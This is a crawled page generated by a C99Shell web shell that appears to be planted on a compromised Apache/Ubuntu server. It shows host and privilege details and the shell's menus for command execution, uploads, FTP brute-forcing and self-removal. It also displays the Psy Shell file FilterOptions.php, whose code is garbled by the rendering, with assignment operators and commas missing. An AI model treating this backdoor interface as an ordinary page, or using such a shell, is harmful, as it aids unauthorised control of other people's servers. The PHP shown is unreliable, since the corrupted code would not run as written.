!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/psy/psysh/src/Input/   drwxrwxrwx
Free 13.35 GB of 57.97 GB (23.04%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     FilterOptions.php (3.8 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of Psy Shell.
 *
 * (c) 2012-2020 Justin Hileman
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Psy\Input;

use 
Psy\Exception\ErrorException;
use 
Psy\Exception\RuntimeException;
use 
Symfony\Component\Console\Input\InputInterface;
use 
Symfony\Component\Console\Input\InputOption;

/**
 * Parse, validate and match --grep, --insensitive and --invert command options.
 */
class FilterOptions
{
    private 
$filter false;
    private 
$pattern;
    private 
$insensitive;
    private 
$invert;

    
/**
     * Get input option definitions for filtering.
     *
     * @return InputOption[]
     */
    
public static function getOptions()
    {
        return [
            new 
InputOption('grep''G'InputOption::VALUE_REQUIRED'Limit to items matching the given pattern (string or regex).'),
            new 
InputOption('insensitive''i'InputOption::VALUE_NONE'Case-insensitive search (requires --grep).'),
            new 
InputOption('invert''v'InputOption::VALUE_NONE'Inverted search (requires --grep).'),
        ];
    }

    
/**
     * Bind input and prepare filter.
     *
     * @param InputInterface $input
     */
    
public function bind(InputInterface $input)
    {
        
$this->validateInput($input);

        if (!
$pattern $input->getOption('grep')) {
            
$this->filter false;

            return;
        }

        if (!
$this->stringIsRegex($pattern)) {
            
$pattern '/'.\preg_quote($pattern'/').'/';
        }

        if (
$insensitive $input->getOption('insensitive')) {
            
$pattern .= 'i';
        }

        
$this->validateRegex($pattern);

        
$this->filter true;
        
$this->pattern $pattern;
        
$this->insensitive $insensitive;
        
$this->invert $input->getOption('invert');
    }

    
/**
     * Check whether the bound input has filter options.
     *
     * @return bool
     */
    
public function hasFilter()
    {
        return 
$this->filter;
    }

    
/**
     * Check whether a string matches the current filter options.
     *
     * @param string $string
     * @param array  $matches
     *
     * @return bool
     */
    
public function match($string, array &$matches null)
    {
        return 
$this->filter === false || (\preg_match($this->pattern$string$matches) xor $this->invert);
    }

    
/**
     * Validate that grep, invert and insensitive input options are consistent.
     *
     * @throws RuntimeException if input is invalid
     *
     * @param InputInterface $input
     */
    
private function validateInput(InputInterface $input)
    {
        if (!
$input->getOption('grep')) {
            foreach ([
'invert''insensitive'] as $option) {
                if (
$input->getOption($option)) {
                    throw new 
RuntimeException('--'.$option.' does not make sense without --grep');
                }
            }
        }
    }

    
/**
     * Check whether a string appears to be a regular expression.
     *
     * @param string $string
     *
     * @return bool
     */
    
private function stringIsRegex($string)
    {
        return 
\substr($string01) === '/' && \substr($string, -1) === '/' && \strlen($string) >= 3;
    }

    
/**
     * Validate that $pattern is a valid regular expression.
     *
     * @throws RuntimeException if pattern is invalid
     *
     * @param string $pattern
     */
    
private function validateRegex($pattern)
    {
        
\set_error_handler([ErrorException::class, 'throwException']);
        try {
            
\preg_match($pattern'');
        } catch (
ErrorException $e) {
            throw new 
RuntimeException(\str_replace('preg_match(): ''Invalid regular expression: '$e->getRawMessage()));
        } finally {
            
\restore_error_handler();
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0052 ]--